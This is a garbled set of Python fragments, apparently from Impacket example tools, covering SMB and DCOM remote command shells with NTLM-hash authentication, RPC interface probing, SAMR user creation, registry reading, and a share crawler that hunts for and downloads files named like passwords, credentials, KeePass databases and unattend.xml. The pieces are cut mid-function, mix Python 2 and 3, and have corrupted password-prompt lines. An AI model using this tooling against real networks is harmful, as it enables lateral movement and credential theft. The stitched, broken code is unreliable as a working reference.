parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar="ip address",
help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '
'the target parameter')
group.add_argument('-target-ip', action='store', metavar="ip address",
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name and you cannot resolve it')
group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
help='Destination port to connect to SMB Server')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
options.target).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if options.target_ip is None:
options.target_ip = address
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:"******"Executing commands from %s" % options.file.name)
for line in options.file.readlines():
if line[0] != '#':
print("# %s" % line, end=' ')
shell.onecmd(line)
else:
print(line, end=' ')
else:
shell.cmdloop()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(str(e))
def main(args):
# Init the example's logger theme
logger.init()
if len(args) != 2:
print "usage: ./ifmap.py <host> <port>"
return 1
host = args[0]
port = int(args[1])
stringbinding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(stringbinding)
trans.set_dport(port)
dce = trans.get_dce_rpc()
dce.connect()
dce.bind(mgmt.MSRPC_UUID_MGMT)
ifids = mgmt.hinq_if_ids(dce)
uuidtups = set(
uuid.bin_to_uuidtup(ifids['if_id_vector']['if_id'][index]['Data'].getData())
for index in range(ifids['if_id_vector']['count'])
)
dce.disconnect()
probes = uuidtups | uuid_database
for tup in sorted(probes):
dce.connect()
binuuid = uuid.uuidtup_to_bin(tup)
try:
dce.bind(binuuid)
except rpcrt.DCERPCException, e:
if str(e).find('abstract_syntax_not_supported') >= 0:
listening = False
else:
raise
else:
listening = True
listed = tup in uuidtups
otherversion = any(tup[0] == uuidstr for uuidstr, ver in uuidtups)
if listed or listening:
print "%r: %s, %s" % (
tup,
"listed" if listed else "other version listed" if otherversion else "not listed",
"listening" if listening else "not listening"
)
if epm.KNOWN_PROTOCOLS.has_key(tup[0]):
print "Protocol: %s" % (epm.KNOWN_PROTOCOLS[tup[0]])
else:
print "Procotol: N/A"
if KNOWN_UUIDS.has_key(uuid.uuidtup_to_bin(tup)[:18]):
print "Provider: %s" % (KNOWN_UUIDS[uuid.uuidtup_to_bin(tup)[:18]])
else:
print "Provider: N/A"
def main():
# Init the example's logger theme
logger.init()
print(version.BANNER)
parser = argparse.ArgumentParser(
add_help=True, description="Reads data from registry hives.")
parser.add_argument('hive', action='store', help='registry hive to open')
subparsers = parser.add_subparsers(help='actions', dest='action')
# A enum_key command
enumkey_parser = subparsers.add_parser(
'enum_key',
help='enumerates the subkeys of the specified open registry key')
enumkey_parser.add_argument('-name',
action='store',
required=True,
help='registry key')
enumkey_parser.add_argument('-recursive',
dest='recursive',
action='store_true',
required=False,
help='recursive search (default False)')
# A enum_values command
enumvalues_parser = subparsers.add_parser(
'enum_values',
help='enumerates the values for the specified open registry key')
enumvalues_parser.add_argument('-name',
action='store',
required=True,
help='registry key')
# A get_value command
getvalue_parser = subparsers.add_parser(
'get_value',
help='retrieves the data for the specified registry value')
getvalue_parser.add_argument('-name',
action='store',
required=True,
help='registry value')
# A get_class command
getclass_parser = subparsers.add_parser(
'get_class',
help='retrieves the data for the specified registry class')
getclass_parser.add_argument('-name',
action='store',
required=True,
help='registry class name')
# A walk command
walk_parser = subparsers.add_parser(
'walk', help='walks the registry from the name node down')
walk_parser.add_argument(
'-name',
action='store',
required=True,
help='registry class name to start walking down from')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
reg = winregistry.Registry(options.hive)
if options.action.upper() == 'ENUM_KEY':
print("[%s]" % options.name)
enumKey(reg, options.name, options.recursive)
elif options.action.upper() == 'ENUM_VALUES':
enumValues(reg, options.name)
elif options.action.upper() == 'GET_VALUE':
getValue(reg, options.name)
elif options.action.upper() == 'GET_CLASS':
getClass(reg, options.name)
elif options.action.upper() == 'WALK':
walk(reg, options.name)
reg.close()
if options.command == 'list':
if options.object == 'user':
users = samr_connection.list_users(remote_name, options.target_ip)
for user in users:
print(user)
elif options.object == 'group':
groups = samr_connection.list_groups(remote_name,
options.target_ip)
for group in groups:
print(group)
elif options.command == 'create':
if options.object == 'user':
samr_connection.create_user(remote_name, options.target_ip,
options.name, USER_NORMAL_ACCOUNT)
elif options.object == 'group':
samr_connection.create_group(remote_name, options.target_ip,
options.name)
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
# Explicitly changing the stdout encoding format
if sys.stdout.encoding is None:
# Output is redirected to a file
sys.stdout = codecs.getwriter('utf8')(sys.stdout)
print(version.BANNER)
main()
if k=='username':
username=v
elif k=='password':
password=v
elif k=='domain':
domain=v
else:
raise AuthFileSyntaxError(path, lineno, 'Unknown option %s' % repr(k))
return (domain, username, password)
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print version.BANNER
parser = argparse.ArgumentParser(add_help = True, description = "Executes a semi-interactive shell using the "
"ShellBrowserWindow DCOM object.")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-share', action='store', default = 'ADMIN$', help='share where the output will be grabbed from '
'(default ADMIN$)')
parser.add_argument('-nooutput', action='store_true', default = False, help='whether or not to print the output '
'(no SMB connection created)')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-object', choices=['ShellWindows', 'ShellBrowserWindow', 'MMC20'], nargs='?', default='ShellWindows',
help='DCOM object to be used to execute the shell command (default=ShellWindows)')
parser.add_argument('command', nargs='*', default = ' ', help='command to execute at the target. If empty it will '
'launch a semi-interactive shell')
def main():
# Init the example's logger theme
logger.init()
print(version.BANNER)
parser = argparse.ArgumentParser(add_help=True,
description="SMB client implementation.")
parser.add_argument(
'target',
action='store',
help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument(
'-ff',
type=argparse.FileType('r'),
help=
'file containing search filters, one filter each line. filters are used '
'to assess whether or not a filename is interesting. Wildcards are accepted.'
' If no file is provided, the following filters will apply: "*password*", '
'"*sensitive*", "*admin*", "*login*", "*secret*", "unattend*.xml", '
'"*.vmdk", "*creds*", "*credential*", "*.config", "*.kdbx"')
parser.add_argument('-share',
action="store",
metavar="Share name",
help='Required. Name of the share to search in',
required=True)
parser.add_argument(
'-of',
action="store",
metavar="Output folder",
default='saved_files/',
help=
'Folder on the local machine where the interesting files will be saved. '
'Defaults to "saved_files"')
parser.add_argument('-path',
action="store",
metavar="PATH",
default='\\',
help='Path in the selected share to start the search. '
'Defaults to the root folder "\\"')
parser.add_argument(
'-depth',
action="store",
metavar="Number",
default=0,
help=
'Depth of the search in the share subfolders. Defaults to 0 (no depth limit)',
type=int)
parser.add_argument(
'-max_file_size',
action="store",
metavar="Number",
default=0,
help=
'Maximum size of interesting files in bytes. If exceeded, the file will not be downloaded. '
'Defaults to 0 (no file size limit)',
type=int)
parser.add_argument(
'-list-only',
action="store_true",
help='Switch: only list interesting files and don\'t download them')
parser.add_argument(
'-list-all',
action="store_true",
help='Switch: list all files without filtering and don\'t download them'
)
parser.add_argument('-debug',
action='store_true',
help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes',
action="store",
metavar="LMHASH:NTHASH",
help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass',
action="store_true",
help='don\'t ask for password (useful for -k)')
group.add_argument(
'-k',
action="store_true",
help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey',
action="store",
metavar="hex key",
help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument(
'-dc-ip',
action='store',
metavar="ip address",
help=
'IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '
'the target parameter')
group.add_argument(
'-target-ip',
action='store',
metavar="ip address",
help=
'IP Address of the target machine. If omitted it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name and you cannot resolve it'
)
group.add_argument('-port',
choices=['139', '445'],
nargs='?',
default='445',
metavar="destination port",
help='Destination port to connect to SMB Server')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, address = re.compile(
'(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
options.target).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if options.target_ip is None:
options.target_ip = address
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:"******"*"]
elif options.ff is not None:
for line in options.ff.readlines():
filters.append(line.replace('\n', '').lower())
else:
filters = [
"*password*", "*sensitive*", "*admin*", "*login*", "*secret*",
"unattend*.xml", "*.vmdk", "*creds*", "*credential*",
"*.config", "*.kdbx"
]
if options.list_only is True or options.list_all is True:
download_files = False
else:
download_files = True
logging.debug("Starting the search with the following filters: %s" %
(', '.join('"{0}"'.format(f) for f in filters)))
finder = GetInterestingFiles(smbClient, options.share, options.path,
filters, options.of, options.depth,
options.max_file_size, download_files)
finder.do_recursive()
logging.info(
"Search completed. saved files (if any) are to be found in the following folder: %s"
% (options.of))
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(str(e))
